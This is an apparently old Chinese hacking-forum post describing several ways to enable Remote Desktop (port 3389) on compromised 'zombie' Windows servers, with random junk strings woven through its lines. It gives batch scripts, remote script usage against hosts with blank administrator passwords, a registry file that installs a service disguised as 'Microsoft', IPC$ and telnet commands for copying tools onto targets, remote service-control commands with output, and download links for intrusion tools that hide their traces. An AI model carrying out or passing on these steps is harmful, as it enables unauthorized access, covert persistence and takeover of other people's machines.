社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3424阅读
  • 0回复

几种开3389端口的方法

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
[hide=60] 1.打开记事本,编辑内容如下: XF_pN[}  
echo [Components] > c:\sql ',4iFuY  
echo TSEnable = on >> c:\sql K!]/(V(}  
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q  50C   
编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。 ]]juN  
vFK<J Sk!  
2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05 "v4B5:bmqW  
地址:www.netsill.com/rots.zip 5Zva:  
使用方法: .eP.&  
在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如: g|Fn7]G  
Dl8;$~  
c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项] M {Q;:  
wIBO ^w\J  
服务端口: 设置终端服务的服务端口。默认是3389。 8Dm%@*B^b  
自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。 K:Q<CQ2  
使用/fr表示强制重起目标。(如果/r不行,可以允哉飧觯?BR>使用此参数时,端口设置不能忽略。 iRi-cQVy  
比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空 %-e 82J1  
运行CMD(2000下的DOS),我们给它开终端! ~**.|%Kc  
命令如下! AjgF6[B  
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr [=^3n#WW  
上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以 /r,这是普通重启) R+,u^;\  
KFkoS0M5|  
脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。 XNu^`Ha  
因为pro版不能安装终端服务。 f:.I0 ST  
如果你确信脚本判断错误,就继续安装好了。 X/M4!L}\  
mcX/GO}  
如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。 = +?7''{>  
d6sye^P  
脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。 {Fe[:\  
-{vKus  
+V^;.P</  
3,下载3389自动安装程序-djshao正式版5.0 oD1/{dRzj  
地址www.netsill.com/djshao.zip 1\rz%E  
说明: _M5|Y@XN-  
解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下,然后进入c:\ winnt\temp目录执行djxyxs.exe解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡会自动重启!重启后会出现终端服务! 3K/MvNI>  
^_5r<{7/ :  
特点:1、不用修改注册表的安装路径,注册表会自动修改,安装完后会自动恢复到原来的安装路径,2、在后台安静模式运行,就算肉鸡旁有人也没有关系!3、在添加和删除中看不出终端服务被安装的痕迹,也就是启动终端前不会打钩,4、不会在肉鸡上留下你的上传文件,在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件!5、不管肉鸡的winnt装在什么盘上都无所谓!6、安装完终端后会删除在管理工具中的终端快捷图标!7、在没有安装终端前,终端服务是被禁止的!安装终端后,终端服务被改为自动!但是如果在安装前终端服务是手动!安装后就可能还是手动!等重启后就不会打开服务!所以在软件中加了sc指令,等安装完后,不管终端服务是禁止还是手动还是自动,全部改为自动。8、自动检测肉鸡是不是服务器版,如果不是删除原文件,不执行安装,如果是服务器版就执行安装!9、支持非法内容,请删除韩繁四个版本的win2000服务器版! f &wb  
{LQ#y/H?  
y[_Q-   
4.下载DameWare NT Utilities 3.66.0.0 注册版 _8)*]-  
地址www.netsill.com/dwmrcw36600.zip ,tJ" 5O3-  
安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。 'D"C4;X  
复制启动后出现对方桌面。 2Jmz(cH%  
在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入后在启动终端服务上打上勾。确定自动提示重起,重起后OK。 -n<pPau2  
Y~E`9  
3% ;a)c;D  
5. :7?FF'u  
qXtC^n@x  
首先我们制作开启3389的工具 ;K &o-y  
先把下面的注册表内容copy一份,另存为3389.reg注册表文件 5=?\1`e1[  
注册表内容: o"BoZsMk  
Windows Registry Editor Version 5.00 WYYa /,{9.  
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] )$bS}.  
"Enabled"="0" Hi`//y*92H  
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] @)&=%  
"ShutdownWithoutLogon"="0" n%s]30Xs  
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] "?I y(*^  
"EnableAdminTSRemote"=dword:00000001 2WVka  
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] (<oy N7NT  
"TSEnabled"=dword:00000001 ?r2` Q  
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] LRG6:&  
"Start"=dword:00000002 &wE%<"aRAl  
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] o\pVpbB  
"Hotkey"="1" 2nIw7>.}f  
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] Jh[UtYb5  
"Start"=dword:00000002 BC<^a )D=  
"ErrorControl"=dword:00000001 K8.!_ c  
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ :#?5X|Gz  
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ f|lU6EkU  
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 i`$*T y"x  
"ObjectName"="LocalSystem" qXe8Kto  
"Type"=dword:00000010 I \JGs@I   
"Description"="Microsoft" >!1.  
"DisplayName"="Microsoft" Jrpx}2'9:a  
再把下面的内容保存为批处理文件3389.bat 25[I=ZdS  
安装批处理内容: MsGM5(r:b  
copy termsrv.exe eventlog.exe C"T;Qp~B  
regedit.exe /s 3389.reg Nyj( 0W  
del 3389.reg 6@0OQb  
del 3389.exe dl@%`E48w  
del 3389.bat ouFYvtFg  
用winrar制作成exe自解压缩包 l +OFw)8od  
u=7J /!H7^  
61.188.***.*** user:administrato pass:空 7.#F,Ue_0T  
先使用工具letmein判断其操作系统 R1GEh&U{  
letmein \\ip -all -d 4X |(5q?  
TsInternetUser (TsInternetUser)这个是2000的终端用户,现在可以判断其为2000server了 os={PQRD  
再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾 g($DdKc|g  
应该没有开启了 }$Tl ?BRpU  
建立ipc连接 |NC*7/}  
copy工具过去 :G2k5xD/E  
net use \\ip\ipc$ "pass" /user:name 'd$P`Vw:  
copy file \\ip\admin$\system32 PFne+T!2F  
用opentelnet开对方的telnet 5BKt1%Pg  
opentelnet \\ip name pass 1 99 iJ3e1w$  
用telnet进入 c+$*$|t=v`  
进入到对方的winnt\system32\ C$D -Pt"+  
目录 ?9\EN|O^  
解压缩3389.exe tL)t"  i  
运行安装批处理3389.bat 2Kyl/C,  
现在我们把对方重起一下,用reboot j<@lX^  
;he"ph=>  
;n=.>s*XL'  
HxK80mJ  
` a/%W4  
7. t@N=kV  
@u]rWVy;\[  
检查对方是否真的禁用了Terminal server -w_QJ_z_  
C:\>sc \\xxx.xxx.xxx.xxx qc termservice Xudg2t)+K  
[SC] GetServiceConfig SUCCESS _p&]|~a  
SERVICE_NAME: termservice ZR]25Yy  
TYPE : 10 WIN32_OWN_PROCESS )~] (&  
START_TYPE : 4 DISABLED a8iQ4   
ERROR_CONTROL : 1 NORMAL =&2 Lb  
BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe 8b-Q F  
LOAD_ORDER_GROUP : A?%H=>v$  
TAG : 0 r )~ T@'y  
DISPLAY_NAME : Terminal Services Vq\`+&A  
DEPENDENCIES : S` ;?z  
SERVICE_START_NAME : LocalSystem Hx*;jpy(2  
仔细看 START_TYPE一项,显示对方该服务的启动模式为“DISABLED”也就是“禁用”。 7/f3Z 1g  
G) 7;;  
TbGn46!:  
C:\>sc \\xxx.xxx.xxx.xxx config termservice start= auto Dg?70v <a  
[SC] ChangeServiceConfig SUCCESS JB`\G=PiL  
好了,现在我们已经把对方终端服务的启动模式修改成自动了。 Q/_f zg  
`-l6S  
DhT>']Z  
v` 7RCg`  
再检查一便对方终端服务的启动模式 ie\"$i.98H  
C:\>sc \\TEST qc termservice PCM-i{6/  
[SC] GetServiceConfig SUCCESS RyK\uv  
SERVICE_NAME: termservice R0vIbFwj  
TYPE : 10 WIN32_OWN_PROCESS 4K\(xd&Q  
START_TYPE : 2 AUTO_START ws|;  `  
ERROR_CONTROL : 1 NORMAL L>%o[tS  
BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe e5B Qr$j  
LOAD_ORDER_GROUP : ~ga`\% J  
TAG : 0 TXk?#G\o  
DISPLAY_NAME : Terminal Services &[/w_| b  
DEPENDENCIES : g,95T Bc  
SERVICE_START_NAME : LocalSystem MLWM&cFG  
;\Y& ce  
T}P".kpbS  
JSW}*HR  
启动对方的终端服务 X+}1  
C:\>sc \\xxx.xxx.xxx.xxx start termservice "4H +!r}  
SERVICE_NAME: termservice ^Z# W_R\l  
TYPE : 10 WIN32_OWN_PROCESS V<@ o<R  
STATE : 2 START_PENDING k"]dK,,  
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN) _/!y)&4"  
WIN32_EXIT_CODE : 0 (0x0) ;z:UN}  
SERVICE_EXIT_CODE : 0 (0x0) \":m!K;Z  
CHECKPOINT : 0x1 :1^R9yWA4  
WAIT_HINT : 0x7530 A"D,Kg S  
b7tOo7aH)  
: b~6i%b  
C:\>sc \\xxx.xxx.xxx.xxx query termservice [4C:r!  
SERVICE_NAME: termservice [uls8 "^/j  
TYPE : 10 WIN32_OWN_PROCESS T{Uc:Z  
STATE : 4 RUNNING MP 2~;T}~  
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN) "7V2lu  
WIN32_EXIT_CODE : 0 (0x0) :8+Nid)  
SERVICE_EXIT_CODE : 0 (0x0) \z7SkZt,GT  
CHECKPOINT : 0x0 rT5Ycm@  
WAIT_HINT : 0x0[/hide]
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
10+5=?,请输入中文答案:十五